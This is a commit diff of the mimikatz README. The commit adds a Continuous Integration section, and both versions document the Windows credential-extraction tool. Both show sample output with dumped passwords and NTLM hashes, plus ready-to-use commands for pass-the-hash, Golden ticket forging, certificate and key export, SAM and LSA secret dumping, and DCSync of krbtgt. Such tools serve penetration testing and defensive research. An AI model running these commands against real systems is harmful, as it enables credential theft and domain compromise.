README.md, before:

# mimikatz

**`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.

It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.

```
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...
```
But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on https://blog.gentilkiwi.com (in French, _yes_).

If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases


## Quick usage
```
log
privilege::debug
```

### sekurlsa
```
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```

### kerberos
```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```

### crypto
```
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export
```

### vault & lsadump
```
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local
```

## Build
`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=44914)
* _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_

`mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)

### Synchronize!
* GIT URL is  : https://github.com/gentilkiwi/mimikatz.git
* SVN URL is  : https://github.com/gentilkiwi/mimikatz/trunk
* ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip

### Build the solution
* After opening the solution, `Build` / `Build Solution` (you can change architecture)
* `mimikatz` is now built and ready to be used! (`Win32` / `x64` even `ARM64` if you're lucky)
  * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.

### ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:
* https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_

## Licence
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

`mimikatz` needs coffee to be developed:
* PayPal: https://www.paypal.me/delpy/

## Author
* Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
* DCSync and DCShadow functions in `lsadump` module were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a **personal** development, please respect its philosophy and don't use it for bad things!

Commit message:

[new] AppVeyor Continuous Integration documented

README.md, after:

# mimikatz

**`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.

It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.

```
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...
```
But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on https://blog.gentilkiwi.com (in French, _yes_).

If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases


## Quick usage
```
log
privilege::debug
```

### sekurlsa
```
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```

### kerberos
```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```

### crypto
```
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export
```

### vault & lsadump
```
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local
```

## Build
`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=44914)
* _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_

`mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)

### Synchronize!
* GIT URL is  : https://github.com/gentilkiwi/mimikatz.git
* SVN URL is  : https://github.com/gentilkiwi/mimikatz/trunk
* ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip

### Build the solution
* After opening the solution, `Build` / `Build Solution` (you can change architecture)
* `mimikatz` is now built and ready to be used! (`Win32` / `x64` even `ARM64` if you're lucky)
  * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.

### ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:
* https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_

## Continuous Integration
`mimikatz` project is available on AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz

Its status is: ![AppVeyor CI status](https://ci.appveyor.com/api/projects/status/github/gentilkiwi/mimikatz?svg=true&retina=true)

## Licence
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

`mimikatz` needs coffee to be developed:
* PayPal: https://www.paypal.me/delpy/

## Author
* Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
* DCSync and DCShadow functions in `lsadump` module were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a **personal** development, please respect its philosophy and don't use it for bad things!
